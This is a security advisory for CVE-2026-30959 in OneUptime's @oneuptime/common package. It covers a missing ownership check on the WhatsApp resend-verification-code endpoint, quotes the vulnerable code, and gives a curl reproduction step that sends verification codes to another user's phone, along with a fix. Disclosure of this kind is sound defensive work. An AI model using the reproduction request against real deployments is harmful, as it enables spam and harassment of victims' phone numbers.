CVE-2026-30959

描述

### Description The resend-verification-code endpoint allows any authenticated user to trigger a verification code resend for any `UserWhatsApp` record by ID. Ownership is not validated (unlike the verify endpoint). ### Affected Source - Endpoint: [UserWhatsAppAPI.ts](https://github.com/OneUptime/oneuptime/Common/Server/API/UserWhatsAppAPI.ts#L129-L153) - Service: [UserWhatsAppService.ts](https://github.com/OneUptime/oneuptime/Common/Server/API/UserWhatsAppAPI.ts#L129-L153) - Verify ownership (present in verify endpoint for comparison): [UserWhatsAppAPI.ts](https://github.com/OneUptime/oneuptime/Common/Server/API/UserWhatsAppAPI.ts#L78-L87) ### Full Code Lines (UserWhatsAppAPI.ts) Resend path (authorization gap): ```ts this.router.post( `${new this.entityType() .getCrudApiPath() ?.toString()}/resend-verification-code`, UserMiddleware.getUserMiddleware, async (req: ExpressRequest, res: ExpressResponse, next: NextFunction) => { try { req = req as OneUptimeRequest; if (!req.body.itemId) { return Response.sendErrorResponse( req, res, new BadDataException("Invalid item ID"), ); } await this.service.resendVerificationCode(req.body.itemId); return Response.sendEmptySuccessResponse(req, res); } catch (err) { return next(err); } }, ); ``` Verify path (ownership check present): ```ts if ( item.userId?.toString() !== (req as OneUptimeRequest)?.userAuthorization?.userId?.toString() ) { return Response.sendErrorResponse( req, res, new BadDataException("Invalid user ID"), ); } ``` ## Prerequisites - Valid attacker account with access to a project - Attacker access token - A victim’s `UserWhatsApp` itemId belonging to the same project ## Steps to Reproduce 1. Set your attacker token: ```bash export ATK="Bearer <attacker-access-token>" ``` 2. Trigger resend for the victim’s item: ```bash curl -s -X POST \ -H "Content-Type: application/json" \ -H "Authorization: $ATK" \ -d '{"itemId":"<victim-userwhatsapp-id>"}' \ http://<host>/api/user-whats-app/resend-verification-code ``` ## Expected/Observed Behavior - HTTP 200 with `{}` body and a new verification code sent to the victim’s phone - No checks confirm that `item.userId` equals the authenticated user’s ID for the resend path ## Impact - Spam/DoS against victims’ phone numbers, social engineering pressure, and potential lockout flows due to repeated resends ## Recommended Fix - Enforce ownership: `item.userId` must match the authenticated user - Add per-item and per-user rate limiting for resends

受影響套件(1)

• npm/@oneuptime/commonfrom 0, < 10.0.21

CVSS 分數

參考連結(4)

• ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2026-30959
• PATCHhttps://github.com/OneUptime/oneuptime
• WEBhttps://github.com/OneUptime/oneuptime/releases/tag/10.0.21
• WEBhttps://github.com/OneUptime/oneuptime/security/advisories/GHSA-cw6x-mw64-q6pv